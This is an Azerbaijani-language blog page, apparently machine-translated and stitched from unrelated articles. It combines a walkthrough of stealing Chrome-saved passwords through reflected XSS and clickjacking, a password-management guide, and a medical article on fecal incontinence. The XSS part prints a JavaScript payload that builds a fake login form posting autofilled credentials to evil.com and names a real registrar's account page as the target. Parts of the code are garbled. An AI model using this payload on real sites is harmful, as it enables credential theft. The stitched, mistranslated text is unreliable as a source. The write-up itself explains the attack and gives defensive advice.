Press "Enter" to skip to content

Parolun saxlanması və yadda saxlanması

Bu hücum XSS hücumlarının sosial mühəndislik ilə birlikdə nə qədər təhlükəli ola biləcəyini açıq şəkildə nümayiş etdirir. Bu cür zəifliklərdən istifadə variantları yalnız javascript imkanları və hakerin təxəyyülü ilə məhdudlaşır.

XSS istifadə edərək Chrome-un saxlanmış parolunu necə oğurlamaq olar?

Bu yazıda, ClickJacking ilə birlikdə XSS hücumundan istifadə edərək hakerlərin brauzerdə saxlanan parolları necə oğurlaya biləcəyi barədə danışacağıq.

Hamınıza salam, əziz dostlar!

Bu yazıda, ClickJacking ilə birlikdə XSS hücumundan istifadə edərək hakerlərin brauzerdə saxlanan parolları necə oğurlaya biləcəyi barədə danışacağıq.

Yeri gəlmişkən, XSS ən populyar veb zəifliklərindən biridir. Düzünü desək, bu, zəiflik deyil, hücumdur, lakin gəlin razılaşaq ki, bəzən XSS dedikdə XSS hücumuna imkan verən zəifliyi nəzərdə tuturuq.

Vikipediyaya görə, XSS (Saytlararası Skript) “web sistemi tərəfindən buraxılan səhifəyə zərərli kodun daxil edilməsindən ibarət olan veb sistemlərinə hücum növüdür (bu, istifadəçi bu səhifəni açdıqda kompüterində həyata keçiriləcək) və bu kodun təcavüzkarın veb serveri ilə qarşılıqlı əlaqəsi.”

Hücumun mahiyyəti

Sayt istifadəçisinə hücum etmək üçün o, xüsusi yaradılmış linki izləməyə məcbur edilməlidir (kanalımızda bunu etməyə imkan verən sosial mühəndislik üsulları haqqında artıq yazmışıq). Xüsusi keçid tələb edən hücum ReflectedXSS adlanır. Zərərli kodun səhifədə saxlandığı StoredXSS də var, buna görə də qurbanı linki izləməyə məcbur etmək lazım deyil, sadəcə kimsə yoluxmuş səhifəni açana qədər gözləyin.

  • Tutaq ki, sosial mühəndislik nəticəsində istifadəçi aşağıdakı linkə klik etdi:

İlk baxışdan o qədər də şübhə doğurmur: uzundur, amma domen düzgündür və orijinal sayt açılır ki, bu da elə görünə bilər ki, qorxulu heç nə yoxdur (spoiler: parolları internet səhifəsində saxlamayanlar). brauzer həqiqətən hücumdan qorxmur). Lakin linkə tıkladığınız zaman URL-də kodlanmış zərərli kod işə salınır. Skript, qurbanın REG.RU şəxsi hesabından brauzerdə saxlanan giriş/parol birləşməsini oğurlayır.

  • Linki izləyən istifadəçinin gözü ilə belə görünür – səhifədə səhv bildirişi görünür (şübhə doğurmamaq üçün məqsədyönlü olaraq bəzi standart mesajları göstəririk):

OK düyməsini sıxdıqda saytın əsas səhifəsi açılacaq. Ümumiyyətlə, hamısı budur. Qəribə, lakin şübhəli deyil. Bu anda hakerin brauzerdə saxlanmış parolu artıq qəbul etdiyini başa düşmək demək olar ki, mümkün deyil.

İndi gəlin bu hücumun əslində necə işlədiyini görək.

Texniki detallar

  • Gəlin görək linkdə nə gizlənir. Bunu etmək üçün onu deşifrə edirik:
  • Linkə kliklədiyiniz zaman JavaScript yüklənir və icra olunur:
var p = document.createElement("input"); p.setAttribute("type", "password"); p.setAttribute("name", "password"); var l = document.createElement("input"); l.setAttribute("type", "text"); l.setAttribute("name", "login"); var f = document.createElement("form"); f.setAttribute("method", "post"); f.setAttribute("action", "https://evil.com/"); f.appendChild(l); f.appendChild(p); document.body.appendChild(f) function clck() , 1000)> document.body.setAttribute('onclick', 'clck()'); setTimeout(()=>,2000)

Bu kod səhifədə giriş formasına uyğun adlarla forma və sahələr yaradır ki, brauzer yadda saxlanmış parolu harada əvəz edəcəyini bilsin. Forma aşağıya əlavə olunur:

Brauzerin (sınaqda Chrome istifadə edilib) parolu əvəz etməsi üçün istifadəçinin səhifə ilə qarşılıqlı əlaqəsi tələb olunur. JS istifadə edərək bir klik simulyasiyası işləməyəcək, sizə real klik lazımdır. Bunun üçün biz qurbanı instinktiv olaraq səhv mesajındakı OK düyməsini sıxmağa təhrik edirik. İstifadəçini müəyyən yerə klik etməyə məcbur etmək ClickJacking adlı hücumun mahiyyətini təşkil edir. Hər şeyin yüklənməsinə və işləməsinə vaxt tapması üçün lazımi fasilələri göstəririk. Body onclick idarəedicisini asırıq.

İlk klikdən sonra parol hakerin saytına göndərilir, burada yalnız onu yazmaq, müştəri isə yönləndirməni əsas səhifəyə qaytarmaq üçün qalır.

  • Beləliklə, orta istifadəçi özünü bu xüsusi hücumdan necə qoruya bilər?
  • Cavab sadədir: parolları brauzerdə saxlamağa ehtiyac yoxdur. Həmkarlarımıza KeePass və ya KeePassXC kimi parol menecerlərindən istifadə etməyi tövsiyə edirik.

Nəticələr

Bu hücum XSS hücumlarının sosial mühəndislik ilə birlikdə nə qədər təhlükəli ola biləcəyini açıq şəkildə nümayiş etdirir. Bu cür zəifliklərdən istifadə variantları yalnız javascript imkanları və hakerin təxəyyülü ilə məhdudlaşır.

KeePassXC uzadılması hücumun uğurlu olma ehtimalını azaldır, lakin onu tamamilə aradan qaldırmır. Hər halda, parolları brauzerdə saxlamaqdan daha təhlükəsizdir.

Parolun saxlanması və yadda saxlanması

Yalnız 2017-ci ildə hackerlər tərəfindən yüz milyonlarla şifrə pozuldu. Heç bir şəkildə pozulmadığınızı düşünməyin, ən azı bir istifadəçi adı / parol cütündən birinin ətrafında üzüb qaldığını, ən yüksək təklifə satıldığını yaxşı qiymətləndirin. Ən çox hackerların çatlamağa çalışması üçün çox nadir və çox mürəkkəb olan möhkəm parollara malik olmasını təmin edərək özünüzü qoruyun.

Yaddaşa əsaslanan texnika

Yüz fərqli şifrəni yadda saxlamanız lazım deyil: Ziyarət etdiyiniz hər bir sayt üçün unikal parol yaratmaq üçün bir yol olsa da, hamısını öz başınıza xatırlayırsınız, asan yadda qalan bir sıra qaydalardan istifadə etməkdir.

Fərqli saytlar şifrə minimum simvol sayıları, xüsusi simvollar istifadə edilməsi, nömrələrin istifadəsi, bəzi rəmzlərin istifadə edilməsi, lakin digərləri üçün fərqli minimum standartları müəyyənləşdirir, bəlkə də bu istifadə hallarının hər biri üçün fərqlənən bir əsas quruluşa ehtiyacınız olacaq alqoritminiz eyni qala bilər.

Məsələn, bir sıra sabit məktublar və nömrələri yadda saxlaya və sonra onu xüsusi web saytına yönəltmək üçün simli dəyişdirin. Məsələn, plitələr 000 ZZZ, bu altı simvoldan bir baz kimi istifadə edə bilərsiniz. Sonra bir nöqtə forması əlavə edin və sonra saytın rəsmi adının ilk dörd məktubu daxil edin. Chase Bank-da hesabınıza daxil olmaq üçün, şifrəniz 000ZZZ! Chas ; Netflix-də şifrəniz 000ZZZ! netf olacaqdır . Şifrənizi dəyişdirmək lazımdırmı? Sonda bir sıra əlavə edin.

Bu yanaşma mükəmməl deyil – bir parol meneceri istifadə edərək daha yaxşı iş görürsünüz, lakin ən azı bu metod, parolunuzun Top 1000 siyahısında görünən bütün parolların təxminən 91 faizi arasında olmadığını təmin edəcəkdir.

Ərizə əsaslı üsullar

Qaydaları xatırlayırsınızsa, sizin üçün parollarınızı yaratmaq, saxlamaq və əldə etmək üçün xüsusi bir tətbiq xidmətindən istifadə etməyi düşünün.

Şifrənizi idarəedən buludda rahatlığını qəbul edərsənsə, cəhd edin:

  • 1Password, səyahət etdiyiniz zaman parollarınızı silmək üçün səyahət variantını ehtiva edir, belə ki, cihazınız sərhəddəki səlahiyyətlilər tərəfindən müsadirə edilərsə, parollarınız təhlükəsizdir
  • Dashlane sizin adınıza parol yaradır və təmin edir
  • LastPass, pulsuz bir tətbiq kimi bir brauzer plugin kimi işləyir
  • RoboForm, təhlükəsiz paylaşma xüsusiyyətini ehtiva edir ki, parolları dostlarınız və həmkarlarınızla paylaşa bilərsiniz

Masa üstü kompüterinizə bağlı olan bir həll etsəniz, cəhd edin:

  • KeePass portativ bir tətbiq kimi yüklənməyi dəstəkləyir, belə ki, hətta kompüterinizdə işləmək üçün yüklənməməlisiniz
  • Parol Təhlükəsizliyi qeyd təhlükəsizlik tədqiqatçısı tərəfindən hazırlanmışdır; alət sadə, lakin effektivdir

Şifrə ən yaxşı təcrübələr

Şifrə ən yaxşı tətbiqetmə qaydaları 2017-ci ildə, ABŞ Standartları və Texnologiyaları İnstitutu, ABŞ Ticarət Nazirliyi daxilində bir təşkilat öz hesabatını, Digital Identity Guidelines: Authentication and Lifecycle Management adlı rəqəmi yayımladığında dəyişdi . NIST, veb saytların dövri parol dəyişiklikləri tələb etməsini dayandırmaq, parol mürəkkəbliyi qaydalarını passphrases lehinə aradan qaldırmaq və parol meneceri vasitələrinin istifadəsini dəstəkləməyi tövsiyə etdi.

NIST standartları informasiya təhlükəsizliyi peşəsi tərəfindən geniş şəkildə qəbul edilir, lakin veb-sayt operatorları yeni rəhbərliyə əsaslanaraq onların siyasətlərini uyğunlaşdırmaq istəmədikləri aydın deyil.

Effektiv parolları saxlamaq üçün aşağıdakıları etməlisiniz:

  • Parol menecerindən istifadə edin
  • Qwerasdfzxcv, məsələn, bitişik düymələri basaraq istifadə edərək “təsadüfi” parollardan istifadə etməyin
  • Veb saytlar arasında parol təkrar istifadə etməyin
  • Lüğətdə olan sözlərə keçin
  • Çox tələffüz edilən parollardan istifadə etməyin

Nəcisin saxlanmamasını anlayın

Nəcisin saxlanmaması o deməkdir ki, siz tualetə çatana qədər nəcinizi və ya nəcisinizi saxlaya bilməyəcəksiniz. Bunun bir çox səbəbi var, məsələn, birdən-birə meydana gələn ishal və ya düz bağırsağın əzələləri və ya sinirləri zədələnir. Düz bağırsağınız bağırsağın son hissəsidir. Bağırsaq hərəkətlərini idarə edir və nə vaxt getmək lazım olduğunu bildirir.

Mütəxəssislər hesab edirlər ki, təxminən hər 12 yetkindən 1-də nəcis tutma problemi olacaq. Yaşlanmanın normal bir hissəsi olmasa da, yaşlandıqca buna sahib olma ehtimalınız daha yüksəkdir. Qadınlar da bu xəstəliyə kişilərdən daha çox risk altındadır.

Nəcis saxlamamaya səbəb nədir?

Nəcisin tutulmaması xroniki xəstəlik, zədə və ya cərrahi müdaxilə nəticəsində yarana bilər, o cümlədən:

  • İshal və ya qəbizlik
  • Böyük hemoroid
  • Onurğa beyninin zədələri və ya xəstəlikləri
  • Anadangəlmə anomaliyalar
  • diabet
  • Ağır demans
  • Geniş iltihablı proseslər
  • Şişlər
  • Doğuş xəsarətləri
  • Anal sfinkterlərin bölündüyü və ya genişləndiyi əməliyyatlar

Nəcis saxlamamanın əlamətləri hansılardır?

Nəcis tutmamanın simptomlarına aşağıdakılar daxildir:

  • Tualetə getmədiyiniz zaman sızan tabure, məs. B. öskürəndə və ya qaz verəndə
  • Tualetə çatmazdan əvvəl keçin

Nəcisin saxlanmaması necə diaqnoz qoyulur?

Probleminizi müəyyən etmək üçün həkiminiz aşağıdakıları nəzərdən keçirəcək:

  • Fiziki imtahan
  • Ümumi sağlamlığınız və tibbi tarixçəniz
  • Semptomların təsviri

Simptomların təsvirinə aşağıdakılar daxil edilməlidir:

  • Probleminizə səbəb kimi görünən hər hansı bir pəhriz və ya fiziki fəaliyyət
  • Hadisələr nə qədər çətindir
  • Ağrı, qəbizlik və ya xəstəlik kimi əlaqəli problemlər
  • Onlar meydana gəldikdə

Görüntü testlərinə aşağıdakılar daxil ola bilər:

    Anal manometriya. İncə, çevik bir boru istifadə edərək, həkiminiz anus və düz bağırsağınız ətrafındakı əzələlərin və sinirlərin nə qədər yaxşı işlədiyini yoxlayacaq.

Həkiminiz duyğularınız və həyat keyfiyyətiniz haqqında da soruşa bilər. Bu vəziyyətin sizə necə təsir etdiyini öyrənmək üçün edilir. Nəcisin saxlanmaması özünə inamı poza bilər. Və qoxulardan tutmuş görünüşünüzə qədər hər şeyin qayğısına qala bilərsiniz.

Nəcisin tutulmaması necə müalicə olunur?

Nəcis tutmamağınız üçün tövsiyə olunan müalicə səbəbdən asılı olacaq. Nəcis tutmamağı idarə etmək üçün birdən çox və ya bir neçə müalicəni sınamaq lazım ola bilər. Mümkün müalicələrə aşağıdakılar daxildir:

  • Dərman. Siz ishal və ya nəcisin saxlanmamasına səbəb olan digər xəstəliklər və ya şərtləri idarə etmək üçün dərmanlar təyin edə bilərsiniz. Yüksək lifli pəhriz demək olar ki, həmişə tövsiyə olunur.
  • Əzələ məşqi. Həkiminiz çanaq döşəmənizdəki əzələləri gücləndirməyə kömək edən xüsusi məşqlər tövsiyə edə bilər.
  • Biofeedback. Bu, bağırsaq hərəkətlərinizi idarə etməyi öyrənmək üçün istifadə edə biləcəyiniz bir klinik vasitədir.
  • Elektrik stimullaşdırılması. Kiçik elektron impulslar istehsal edən implantlar bağırsaq hərəkətlərini idarə etmək üçün cərrahi yolla əsas sinirlərin yanına yerləşdirilə bilər.
  • Anal tıxac. Bu çıxarıla bilən cihaz tualetə nə vaxt getməyinizi idarə etməyi asanlaşdırır. Yüngül narahatlığa əhəmiyyət verməyən insanlar üçün faydalıdır.
  • Cərrahiyyə. Bəzi hallarda cərrahiyyə bağırsaq funksiyasını yaxşılaşdıra və ya struktur problemini həll edə bilər.
  • Digər üsullar. Sfinkteri sıxmaq üçün iynələr və ya maqnit muncuq implantı ala bilərsiniz.

Nəcis saxlamamanın fəsadları hansılardır?

Fəsadlar vəziyyətinizin səbəb olduğu problemlərdir. Nəcis tutmama ilə aşağıdakı ağırlaşmalar baş verə bilər:

  • Emosional və sosial stress. Nəcis tutmamaq utancvericidir və siz işdən və sosial vəziyyətlərdən qaçmağa başlaya bilərsiniz. Bəzi insanlar bu problemə görə depressiyaya düşürlər.
  • Fiziki qıcıqlanma. Nəcislə tez-tez təmasda olmaq və silmək anus ətrafındakı dərini qıcıqlandıra bilər.
  • Zəif pəhriz. Vaxt keçdikcə şiddətli nəcis tutmama vücudunuzun yeməyinizdən kifayət qədər qida almasına mane ola bilər. Həkiminiz pəhriz əlavələri tövsiyə edə bilər.

Nəcisin tutulmasının qarşısını necə ala bilərəm?

Nəcisin saxlanmamasının bir çox səbəbinin qarşısını almaq mümkün deyil. Bununla belə, səbəbi tapmaq üçün diaqnostika prosesindən keçdiyiniz zaman sidik tutmama epizodlarının qarşısının alınmasını öyrənə bilərsiniz. Məsələn, pəhrizinizdə günahkarsınızsa, bu, spirt və ya kofein kimi müəyyən qidalardan və ya içkilərdən qaçmağa kömək edə bilər. Bu, çoxlu maye ilə yüksək lifli bir pəhriz ola bilər. Müəyyən müalicələr, məsələn B. Bağırsaq məşqləri günün qalan hissəsini planlaşdırmağa və qəzalardan qaçmağa kömək edə bilər.

Nəcis qaçırma ilə yaşamaq

Əgər nəcis tutmama ilə yaşayırsınızsa, həyatınızdan həzz almağa davam edə bilməniz üçün müəyyən addımlar atmağınız lazım ola bilər. Bu addımlara aşağıdakılar daxildir:

  • Həkiminizlə işləyin. Müalicəyə bəzi yanaşmaların təsirli olması müəyyən vaxt tələb edə bilər. Həkiminizin sizə verdiyi hər hansı dərman üçün göstərişlərə əməl edin. İstehlak materiallarından necə istifadə edəcəyinizə əmin deyilsinizsə, sağlamlıq qrupunuzla əlaqə saxlayın. Heç bir yaxşılaşma görmürsünüzsə, həkiminizlə əlaqə saxlayın.
  • Terapiyaya cəhd edin. Nəcis saxlamamaq münasibətlərinizə, iş həyatınıza və ya ümumi həyat keyfiyyətinizə təsir edirsə, psixoloqla söhbət faydalı ola bilər.
  • Qida gündəliyi saxlayın. Yediyiniz qidaları və nəcis tutmamanın baş verdiyi günləri və ya vaxtları izləyin. Bu, pəhrizinizdə probleminizə kömək edən bir nümunəni aşkar etməyə kömək edə bilər.
  • Bağırsaqlarınızı məşq edin. Bağırsaq qaçırma riskini azaltmağın bir yolu mütəmadi olaraq tualetə getmək və bağırsaq hərəkətini sınamaqdır.
  • Paltar dəyişdirin. Həmişə hazır olun. Təzə paltar və ayaqqabı, təmizləyici salfetlər və çirkli əşyaları saxlamaq üçün ehtiyat çanta geyin.
  • Emici yastiqciqlar taxin. Bəzi inkontinans məhsulları alın, məsələn: B. Nəcis tutmama ilə mübarizə aparmağı öyrəndiyiniz zaman sızıntıları və qoxuları udan yastıqlar.
  • Anti-dezodorant dərman qəbul edin. Nəcis tutmama ilə bağlı qoxuları azalda bilən dərmanlar haqqında həkiminizlə danışın.
  • Həssas dəriyə qulluq etməyi öyrənin. Dərinin qıcıqlanmasının və nəcisin tutulmaması ilə bağlı ağrıların qarşısını almaq üçün təmizləyici və qoruyucu vasitələrdən istifadə edin.

Həkimimi nə vaxt çağırmalıyam?

Həyat keyfiyyətinizə təsir edən nəcis tutmama problemini müzakirə etmək üçün görüş təyin etmək üçün həkiminizə zəng edin. Əgər nəcis tutmamağınız tez-tez, davamlı ishaldan qaynaqlanırsa və sizdə susuzluq əlamətləri varsa, dərhal həkiminizə müraciət edin.

Vacib məqamlar

  • Nəcisin saxlanmaması o deməkdir ki, siz tualetə çatana qədər nəcinizi və ya nəcisinizi saxlaya bilməyəcəksiniz.
  • Nəcisin saxlanmaması ishal, düz bağırsağın zədələnmiş əzələləri və ya sinirləri, iri hemoroid, qəbizlik və ya xroniki xəstəlik nəticəsində yarana bilər.
  • Nəcis tutmamağınız üçün tövsiyə olunan müalicə səbəbdən asılı olacaq.

Related posts:

  1. Ölçmə identifikatorunu necə bilirik
  2. Sansa mp3 pleyerdə necə musiqi yaza bilərəm
  3. Necə daha asan əyilə bilərəm?
  4. Hdmi kabeli qoşulduqda pc ekranını necə söndürə bilərəm?

Published in blog

Comments are closed, but trackbacks and pingbacks are open.